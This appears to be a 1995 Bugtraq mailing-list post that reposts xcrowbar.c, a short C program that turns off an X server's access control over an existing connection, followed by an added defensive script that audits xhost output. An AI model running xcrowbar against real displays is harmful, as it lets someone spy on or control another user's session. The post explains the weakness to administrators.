[614] in bugtraq


No subject found in mail header

daemon@ATHENA.MIT.EDU (William McVey)
Wed Jan 11 15:39:44 1995

To: der Mouse <mouse@Collatz.McRCIM.McGill.EDU>
Cc: bugtraq@fc.net
Date: Wed, 11 Jan 1995 13:27:36 -0500
From: wam@cs.purdue.edu (William McVey)

der Mouse wrote:
>What's xcrowbar, and how does it "turn[] off the authority mechanisms
>altogether"?  In my experience, only clients running on the local host,
>or the xdm host if the server was started with xdm, can fiddle with the
>access control mechanisms.

Since several people have asked me about xcrowbar in private mail, I'm
just going to reply to the group.  xcrowbar was posted to
comp.security.unix a few months back.  Since the source code is so
short and the problem (people give access to their displays to
untrustworthy people) has a known solution (only give trustworthy
people access to your display), I'm reposting the article here.  I've
attached the original article (minus a few headers) to the bottom of
this mail.  It should be obvious what it does.

As for only the local host or xdm host being able to "fiddle with the
access control mechanism", I highly doubt that the statement is true.
X servers (well, at least the distributed ones) don't pay any special
attention to whether a client is local or remote.

>In any case, yes, it's true that "xhost -" doesn't magically mean
>you're safe again.  What I do, to get the convenience of "xhost -"
>without giving up quite as much security, is I run a front-end program
>that accepts connections, ... 
<snip>

I don't suppose the program you run is freely available someplace?

 -- William

 ---- Begin article about xcrowbar ----

 Article: 8570 of comp.security.unix
 From: matt@cs.su.oz.au (Robert Matthew Barrie)
 Newsgroups: comp.security.unix
 Subject: xcrowbar.c
 Date: 1 Oct 1994 05:32:44 GMT
 Organization: Basser Department of Computer Science, University of Sydney
 Distribution: world
 Message-ID: <36is9s$qrb@staff.cs.su.oz.au>

Like I said, a simple program that lets you do an XDisableAccessControl()
on a display if someone decides to "xhost -" you after you have a
pointer to their display.

matt


 --- cut here
#include <stdio.h>
#include <stdlib.h>
#include <X11/Xlib.h>

/*
 * xcrowbar: open a connection to a display and, for every key other
 * than 'q' typed on stdin, ask the server to disable host-based access
 * control again.  "xhost -" on the victim's side does not close client
 * connections that already exist, and the server does not check whether
 * the client sending the request is local or remote, so a connection
 * obtained earlier is all that is needed.
 */
int
main (int argc, char *argv[])
{
	Display *dpy;
	char *dis = NULL;	/* NULL makes XOpenDisplay() use $DISPLAY */
	int c;

	if (argc > 1)
		dis = argv[1];

	/* XOpenDisplay() does not set errno, so report the name ourselves. */
	if ((dpy = XOpenDisplay(dis)) == NULL) {
		fprintf(stderr, "could not open display %s\n",
		    XDisplayName(dis));
		exit(1);
	}

	/* Keep re-issuing the request until 'q' is typed or stdin closes. */
	while ((c = getchar()) != 'q' && c != EOF) {
		XDisableAccessControl(dpy);
		XSync(dpy, False);	/* flush so the request takes effect now */
	}

	XCloseDisplay(dpy);
	return 0;
}

 ---- End article about xcrowbar ----
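The thread's point is that "xhost -" only edits the server's host list: a client that connected while it was permitted stays connected and can call XDisableAccessControl() whenever it likes. The operator-side check that follows is an added example, not code from the thread or from xcrowbar. It parses what xhost(1) prints and flags a display whose access control is off or which still admits whole hosts. The function name audit_xhost and the assumed output format (the "access control enabled/disabled" banner followed by one entry per line, such as "INET:host", "LOCAL:" or "SI:localuser:name") are assumptions; the sample outputs in the usage are constructed, not captured from a real server.

```shell
#!/bin/sh
# Added example (not part of the original thread or of xcrowbar): audit the
# access-control state that xhost(1) reports for a display.  A client that
# already holds a connection can call XDisableAccessControl() at any time,
# so "xhost -" only tells you about the state at the moment you ran it.
#
# Assumed xhost output format (X11R6 / Xorg style):
#   access control enabled, only authorized clients can connect
#   access control disabled, clients can connect from any host
# followed by one entry per line, e.g. "INET:host", "LOCAL:", "SI:localuser:u".

# audit_xhost: read xhost(1) output on stdin and print one line per finding.
# Returns 0 when the display is locked down (access control on and only
# SI:localuser entries), 1 when a client could connect without a cookie.
audit_xhost() {
    status=0
    while IFS= read -r line; do
        case "$line" in
            "access control disabled"*)
                echo "EXPOSED: access control is off (xhost + or an already-connected client's XDisableAccessControl)"
                status=1 ;;
            "access control enabled"*)
                echo "ok: access control on" ;;
            SI:localuser:*)
                echo "ok: user-scoped entry $line" ;;
            "")
                ;;
            *)
                # Host-based and LOCAL: entries admit every user on that host.
                echo "EXPOSED: host-based entry $line"
                status=1 ;;
        esac
    done
    return $status
}

# Live check when a display is reachable; with no DISPLAY nothing runs here.
if [ -n "${DISPLAY:-}" ] && command -v xhost >/dev/null 2>&1; then
    if xhost 2>/dev/null | audit_xhost; then
        echo "display $DISPLAY: locked down"
    else
        echo "display $DISPLAY: restart the X server to evict connected clients; use xauth cookies rather than xhost"
    fi
fi
```

An "EXPOSED" verdict after you believed you had run "xhost -" is exactly the xcrowbar situation; since the rogue client keeps its connection across any xhost change, the only way to get rid of it is to terminate the server (and then authorize clients with xauth cookies instead of host entries). Running the check from cron gives you a cheap way to notice when the state flips back.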
